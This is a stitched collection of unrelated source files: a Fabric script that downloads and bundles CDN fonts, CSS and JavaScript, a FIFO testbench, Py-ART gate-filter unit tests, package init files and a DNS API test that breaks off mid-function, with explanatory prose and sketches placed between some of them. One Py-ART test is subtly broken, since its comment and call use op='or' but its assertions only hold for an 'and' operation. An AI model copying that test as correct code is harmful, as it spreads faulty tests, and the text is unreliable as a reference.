c.argument('width', type=int, help='The width of the photo. Read-only.')
with self.argument_context('personalcontacts user-contact update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
# fabfile.py | xingtingyang/markdown-core @ fea0414954400bf9ee25c4a50904fe492b08d880 | license: MIT
from fabric.api import local
def update():
local('rm -rf node_modules')
local('ncu -ua')
local('npm install')
def fonts():
local('rm -rf dist/fonts/*')
for font in """https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.eot
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.svg
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.ttf
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.woff
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.woff2""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
for font in """https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.eot
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.svg
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.ttf
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.woff""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
for font in """https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.woff2""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
def css():
local('rm -rf dist/*.css')
# github-markdown-css/2.3.0 heading anchor hover style incorrect. didn't upgrade
local('curl https://cdn.jsdelivr.net/github-markdown-css/2.2.1/github-markdown.css > dist/markdown-core.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/styles/atom-one-light.min.css >> dist/markdown-core.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/emojione/2.2.6/assets/css/emojione.min.css >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/mermaid/6.0.0/mermaid.css >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css | sed "s/..\/fonts\//fonts\//g" >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/ionicons/2.0.1/css/ionicons.min.css | sed "s/..\/fonts\//fonts\//g" >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/katex/0.6.0/katex.min.css >> dist/markdown-core.css')
local('cat markdown-core.css >> dist/markdown-core.css')
local('cleancss -o dist/markdown-core.min.css dist/markdown-core.css')
local('rm dist/markdown-core.css')
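The `sed "s/..\/fonts\//fonts\//g"` filters piped after the Font Awesome and Ionicons downloads rewrite the upstream stylesheets' relative font URLs (`../fonts/`) so they resolve against the `dist/fonts/` directory that `fonts()` populates. The same substitution, sketched in plain Python for illustration (not part of the build itself):

```python
def rewrite_font_urls(css_text):
    # Mirror of the sed expression s/..\/fonts\//fonts\//g:
    # replace every "../fonts/" occurrence with "fonts/".
    return css_text.replace("../fonts/", "fonts/")

print(rewrite_font_urls("src: url('../fonts/ionicons.woff');"))
# → src: url('fonts/ionicons.woff');
```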
def js():
local('rm -rf dist/*.js')
local('./node_modules/babel-cli/bin/babel.js markdown-core-node.js > temp.js')
local('browserify temp.js -s mdc > dist/markdown-core.js')
local('rm temp.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdn.jsdelivr.net/js-cookie/2.2.0/js.cookie.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdn.jsdelivr.net/mermaid/6.0.0/mermaid.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://rawgit.com/asciimath/asciimathml/master/asciimath-based/ASCIIMathTeXImg.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('cat ./node_modules/chart.js/dist/Chart.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('./node_modules/babel-cli/bin/babel.js markdown-core-browser.js >> dist/markdown-core.js')
local('uglifyjs dist/markdown-core.js -cmo dist/markdown-core.min.js')
local('rm dist/markdown-core.js')
def dist():
local('npm install')
css()
fonts()
js()
def mdm(): # copy dist code to Markdown Mate project
local('cp -f index.html ~/src/swift/markdown-mate/Markdown\ Mate/markdown-core/')
local('cp -rf dist ~/src/swift/markdown-mate/Markdown\ Mate/markdown-core/')
def mdp(): # copy dist code to Markdown Plus project
local('cp -f index.html ~/src/swift/markdown-plus/Markdown\ Plus/markdown-core/')
local('cp -rf dist ~/src/swift/markdown-plus/Markdown\ Plus/markdown-core/')
# tests/test_fifo.py | asinghani/wbdbgbus @ a1ee94f140cb7c92efc97d8c5906af7df13fe92e | license: MIT
from .testbench import Testbench, asserteq
import os
import random
assert os.getcwd().replace("/", "").endswith("sim_build")
WIDTH = 8
DEPTH = 16
def test_fifo():
    tb = Testbench("wbdbgbus_fifo.sv", "test_fifo",
                   params={"WIDTH": WIDTH, "DEPTH": DEPTH})
    dut = tb.dut
    tb.tick(2)

    for i in range(5):
        print("Full depth write & readback test")
        data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH)]

        asserteq(dut.o_empty, 1)
        for x in data:
            dut.i_wr_en = 1
            dut.i_wr_data = x
            asserteq(dut.o_full, 0)
            tb.tick()
            asserteq(dut.o_empty, 0)
        asserteq(dut.o_full, 1)
        dut.i_wr_en = 0
        tb.tick()

        # Readback
        for x in data:
            dut.i_rd_en = 1
            asserteq(dut.o_empty, 0)
            tb.tick()
            asserteq(dut.o_rd_data, x)
            asserteq(dut.o_full, 0)
        asserteq(dut.o_empty, 1)
        dut.i_rd_en = 0
        tb.tick()

        print("Write & reset test")
        data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH)]

        # Write junk data
        asserteq(dut.o_empty, 1)
        for x in range(5):
            dut.i_wr_en = 1
            dut.i_wr_data = x
            asserteq(dut.o_full, 0)
            tb.tick()
            asserteq(dut.o_empty, 0)

        # Reset
        dut.i_wr_en = 0
        dut.i_rst = 1
        tb.tick()
        dut.i_rst = 0
        tb.tick()

        # Write real data
        asserteq(dut.o_empty, 1)
        for x in data:
            dut.i_wr_en = 1
            dut.i_wr_data = x
            asserteq(dut.o_full, 0)
            tb.tick()
            asserteq(dut.o_empty, 0)
        asserteq(dut.o_full, 1)
        dut.i_wr_en = 0
        tb.tick()

        # Readback
        for x in data:
            dut.i_rd_en = 1
            asserteq(dut.o_empty, 0)
            tb.tick()
            asserteq(dut.o_rd_data, x)
            asserteq(dut.o_full, 0)
        asserteq(dut.o_empty, 1)
        dut.i_rd_en = 0
        tb.tick()

        print("Partial depth write & readback test")
        data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH // 3)]

        asserteq(dut.o_empty, 1)
        for x in data:
            dut.i_wr_en = 1
            dut.i_wr_data = x
            asserteq(dut.o_full, 0)
            tb.tick()
            asserteq(dut.o_empty, 0)
        dut.i_wr_en = 0
        tb.tick()

        # Readback
        for x in data:
            dut.i_rd_en = 1
            asserteq(dut.o_empty, 0)
            tb.tick()
            asserteq(dut.o_rd_data, x)
            asserteq(dut.o_full, 0)
        asserteq(dut.o_empty, 1)
        dut.i_rd_en = 0
        tb.tick()


test_fifo()
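The first-in/first-out contract the testbench exercises (full/empty flags, in-order readback, reset) can be sketched as a plain-Python reference model. `SoftFifo` below is illustrative only and is not part of wbdbgbus; it mirrors the behavior the hardware asserts check:

```python
class SoftFifo:
    """Behavioral FIFO model: bounded, in-order, with full/empty flags."""

    def __init__(self, depth):
        self.depth = depth
        self.items = []

    @property
    def empty(self):
        return len(self.items) == 0

    @property
    def full(self):
        return len(self.items) == self.depth

    def write(self, x):
        # mirrors asserteq(dut.o_full, 0) before each hardware write
        assert not self.full, "write while full"
        self.items.append(x)

    def read(self):
        # mirrors asserteq(dut.o_empty, 0) before each hardware read
        assert not self.empty, "read while empty"
        return self.items.pop(0)

    def reset(self):
        # mirrors pulsing dut.i_rst: contents are discarded
        self.items.clear()
```

The same three test phases above (full-depth, write-and-reset, partial-depth) hold for this model as well.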
# opac/tests/services/__init__.py (from rimphyd/Django-OPAC, MIT license)
from .holding import *  # noqa: F401 F403
from .lending import * # noqa: F401 F403
# pyart/filters/tests/test_gatefilter.py (from josephhardinee/pyart,
# OLDAP-2.6 / Python-2.0 licenses)
""" Unit tests for Py-ART's correct/filters.py module. """
import numpy as np
from numpy.testing import assert_raises
import pyart
radar = pyart.testing.make_empty_ppi_radar(10, 36, 1)
# a simple field
fdata = np.tile(np.arange(10.), 36).reshape(36, 10)
radar.add_field('test_field', {'data': fdata})
# more
fdata2 = np.ma.masked_array(fdata, copy=True)
fdata2[2, 2] = np.ma.masked
fdata2[3, 3] = np.NAN
fdata2[4, 4] = np.PINF
fdata2[5, 5] = np.NINF
radar.add_field('test_field2', {'data': fdata2})
def test_gatefilter_init():
    gfilter = pyart.correct.GateFilter(radar)
    assert np.all(gfilter.gate_excluded == np.False_)


def test_gatefilter_exclude_below():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_below('test_field', 5)
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, -1] is np.False_

    gfilter.exclude_below('test_field', 99)
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, -1] is np.True_


def test_gatefilter_exclude_above():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_above('test_field', 5)
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[0, -1] is np.True_

    gfilter.exclude_above('test_field', -5)
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, -1] is np.True_


def test_gatefilter_exclude_inside():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_inside('test_field', 2, 5)
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[0, 3] is np.True_
    assert gfilter.gate_excluded[0, -1] is np.False_

    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_inside('test_field', 5, 2)
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[0, 3] is np.True_
    assert gfilter.gate_excluded[0, -1] is np.False_


def test_gatefilter_exclude_outside():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_outside('test_field', 2, 5)
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 3] is np.False_
    assert gfilter.gate_excluded[0, -1] is np.True_

    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_outside('test_field', 5, 2)
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 3] is np.False_
    assert gfilter.gate_excluded[0, -1] is np.True_


def test_gatefilter_exclude_equal():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_equal('test_field', 2)
    assert gfilter.gate_excluded[0, 2] is np.True_
    assert gfilter.gate_excluded[0, 3] is np.False_


def test_gatefilter_exclude_not_equal():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_not_equal('test_field', 2)
    assert gfilter.gate_excluded[0, 2] is np.False_
    assert gfilter.gate_excluded[0, 3] is np.True_


def test_gatefilter_exclude_all():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_all()
    assert np.all(gfilter.gate_excluded == np.True_)


def test_gatefilter_exclude_none():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_none()
    assert np.all(gfilter.gate_excluded == np.False_)


def test_gatefilter_exclude_masked():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_masked('test_field2')
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[2, 2] is np.True_
    assert gfilter.gate_excluded[3, 3] is np.False_
    assert gfilter.gate_excluded[4, 4] is np.False_
    assert gfilter.gate_excluded[5, 5] is np.False_


def test_gatefilter_exclude_invalid():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_invalid('test_field2')
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[2, 2] is np.True_
    assert gfilter.gate_excluded[3, 3] is np.True_
    assert gfilter.gate_excluded[4, 4] is np.True_
    assert gfilter.gate_excluded[5, 5] is np.True_


def test_gatefilter_exclude_gates():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.include_all()
    gates = gfilter.gate_excluded
    gates[2, 0] = np.True_
    gates[2, 2] = np.True_
    gfilter.exclude_gates(gates)

    # exclude when included
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[2, 0] is np.True_

    # exclude when already excluded
    gfilter.exclude_gates(gates)
    assert gfilter.gate_excluded[2, 0] is np.True_

    gates[2, 0] = np.False_
    gates[0, 2] = np.True_

    # exclude with op='and'
    gfilter.exclude_gates(gates, op='and')
    assert gfilter.gate_excluded[2, 0] is np.False_
    assert gfilter.gate_excluded[0, 2] is np.False_
    assert gfilter.gate_excluded[2, 2] is np.True_


def test_gatefilter_ops():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_below('test_field', 0.5, op='or')
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.False_

    gfilter.exclude_above('test_field', 8.5, op='or')
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.True_

    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_below('test_field', 0.5, op='or')
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.False_

    gfilter.exclude_above('test_field', 8.5, op='and')
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.False_

    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_below('test_field', 0.5, op='or')
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.False_

    gfilter.exclude_above('test_field', 8.5, op='new')
    assert gfilter.gate_excluded[0, 0] is np.False_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_excluded[0, 9] is np.True_


def test_gatefilter_raises():
    gfilter = pyart.correct.GateFilter(radar)
    assert_raises(ValueError, gfilter.exclude_below, 'test_field', 0.5,
                  op='fuzz')
    assert_raises(ValueError, gfilter.exclude_below, 'test_field', 0.5,
                  exclude_masked='fuzz')
#################
# include tests #
#################
def test_gatefilter_gate_included_attribute():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_below('test_field', 0.5, op='or')
    assert gfilter.gate_excluded[0, 0] is np.True_
    assert gfilter.gate_excluded[0, 1] is np.False_
    assert gfilter.gate_included[0, 0] is np.False_
    assert gfilter.gate_included[0, 1] is np.True_


def test_gatefilter_include_below():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_below('test_field', 5)
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[0, -1] is np.False_

    gfilter.include_below('test_field', 99)
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[0, -1] is np.True_


def test_gatefilter_include_above():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_above('test_field', 5)
    assert gfilter.gate_included[0, 0] is np.False_
    assert gfilter.gate_included[0, -1] is np.True_

    gfilter.include_above('test_field', -5)
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[0, -1] is np.True_


def test_gatefilter_include_inside():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_inside('test_field', 2, 5)
    assert gfilter.gate_included[0, 0] is np.False_
    assert gfilter.gate_included[0, 3] is np.True_
    assert gfilter.gate_included[0, -1] is np.False_

    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_inside('test_field', 5, 2)
    assert gfilter.gate_included[0, 0] is np.False_
    assert gfilter.gate_included[0, 3] is np.True_
    assert gfilter.gate_included[0, -1] is np.False_


def test_gatefilter_include_outside():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_outside('test_field', 2, 5)
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[0, 3] is np.False_
    assert gfilter.gate_included[0, -1] is np.True_

    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_outside('test_field', 5, 2)
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[0, 3] is np.False_
    assert gfilter.gate_included[0, -1] is np.True_


def test_gatefilter_include_equal():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_equal('test_field', 2)
    assert gfilter.gate_included[0, 2] is np.True_
    assert gfilter.gate_included[0, 3] is np.False_


def test_gatefilter_include_not_equal():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_not_equal('test_field', 2)
    assert gfilter.gate_included[0, 2] is np.False_
    assert gfilter.gate_included[0, 3] is np.True_


def test_gatefilter_include_all():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_all()
    assert np.all(gfilter.gate_included == np.True_)


def test_gatefilter_include_none():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_none()
    assert np.all(gfilter.gate_included == np.False_)


def test_gatefilter_include_masked():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_not_masked('test_field2')
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[2, 2] is np.False_
    assert gfilter.gate_included[3, 3] is np.True_
    assert gfilter.gate_included[4, 4] is np.True_
    assert gfilter.gate_included[5, 5] is np.True_


def test_gatefilter_include_valid():
    gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
    gfilter.include_valid('test_field2')
    assert gfilter.gate_included[0, 0] is np.True_
    assert gfilter.gate_included[2, 2] is np.False_
    assert gfilter.gate_included[3, 3] is np.False_
    assert gfilter.gate_included[4, 4] is np.False_
    assert gfilter.gate_included[5, 5] is np.False_


def test_gatefilter_include_gates():
    gfilter = pyart.correct.GateFilter(radar)
    gfilter.exclude_all()
    gates = gfilter.gate_included
    gates[2, 0] = np.True_
    gates[2, 2] = np.True_
    gfilter.include_gates(gates)

    # include when excluded
    assert gfilter.gate_included[0, 0] is np.False_
    assert gfilter.gate_included[2, 0] is np.True_

    # include when already included
    gfilter.include_gates(gates)
    assert gfilter.gate_included[2, 0] is np.True_

    gates[2, 0] = np.False_
    gates[0, 2] = np.True_

    # include with op='or'
    gfilter.include_gates(gates, op='or')
    assert gfilter.gate_included[2, 0] is np.False_
    assert gfilter.gate_included[0, 2] is np.False_
    assert gfilter.gate_included[2, 2] is np.True_
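The `op='or'` / `op='and'` / `op='new'` semantics exercised by `test_gatefilter_ops` can be illustrated with a small pure-Python sketch. This is an assumption for illustration only, not Py-ART's actual implementation (which operates on NumPy boolean arrays):

```python
def exclude_below(excluded, field, value, op="or"):
    """Mark gates whose field value falls below `value` as excluded,
    combining with the existing mask according to `op`."""
    new = [x < value for x in field]
    if op == "or":
        # union: a gate stays excluded once any filter excludes it
        return [a or b for a, b in zip(excluded, new)]
    if op == "and":
        # intersection: a gate is excluded only if both filters agree
        return [a and b for a, b in zip(excluded, new)]
    if op == "new":
        # discard the old mask entirely
        return new
    raise ValueError("unknown op: %r" % op)
```

With `field = range(10)`, chaining `op='new'`, `op='and'`, and `op='or'` reproduces the composition behavior the tests above assert on `gate_excluded`.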
# toon/util/__init__.py (from aforren1/toon, MIT license)
from toon.util.priority import priority
from toon.util.clock import MonoClock, mono_clock
# api/test/test_validation.py (from riszkymf/RESTKnot, MIT license)
import pytest
import json
import utils
class Vars:
    ids = dict()


class DataTest(object):
    identity = None
    record_type = {
        "soa": "402140280385142785",
        "srv": "402329131320508417",
        "a": "402386688803307521",
        "ns": "402393625286410241",
        "cname": "402427533112147969",
        "mx": "402427545745850369",
        "aaaa": "402427683852124161",
        "txt": "402427759247851521"
    }
    def post_data(self, client, endpoint, data, headers):
        url = 'api/' + endpoint
        res = client.post(url, data=json.dumps(data),
                          content_type='application/json', headers=headers)
        return res

    def generate_empty_data(self):
        self.identity = {
            "zone": None,
            "records": list(),
            "content": list(),
            "content_serial": list()
        }

    def add_zone(self, client, nm_zone, headers):
        dataset = {}
        url = 'user/dnscreate'
        data = {"domain": nm_zone}
        res = self.post_data(client, url, data, headers)
        tmp = json.loads(res.data.decode('utf8'))
        if str(tmp['code']) == '200':
            dataset['id_zone'] = tmp['data']['data']['id_zone']
            dataset['nm_zone'] = tmp['data']['data']['nm_zone']
        elif str(tmp['code']) == '401':
            where = {"nm_zone": nm_zone}
            where = utils.get_model('where', where)
            res = self.post_data(client, 'zone', where, headers)
            data = json.loads(res.data.decode('utf8'))
            data = data['data'][0]
            dataset['id_zone'] = data['id_zone']
            dataset['nm_zone'] = nm_zone
        if not self.identity:
            self.generate_empty_data()
        self.identity['zone'] = dataset
        return res
    def add_record(self, client, nm_record, type_, headers):
        url = 'record'
        id_type = self.record_type[type_.lower()]
        data = {"id_zone": self.identity['zone']['id_zone'],
                "nm_record": nm_record, "id_type": id_type,
                "date_record": "2019220207"}
        send_data = utils.get_model("add", data)
        res = self.post_data(client, url, send_data, headers)
        id_record = json.loads(res.data.decode('utf8'))
        try:
            id_record = id_record['message']['id']
        except Exception:
            print(json.loads(res.data.decode('utf8')))
        # track the record for teardown (create identity first if needed)
        if not self.identity:
            self.generate_empty_data()
        self.identity['records'].append(id_record)
        return res
    def add_content_data(self, client, content, id_record, headers):
        dataset = dict()
        endpoint = 'ttldata'
        data = {"id_record": id_record, "id_ttl": "402428126292705281"}
        json_send = utils.get_model("add", data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        id_ttldata = tmp['message']['id']

        endpoint = 'content'
        data = {"id_ttldata": id_ttldata, "nm_content": content}
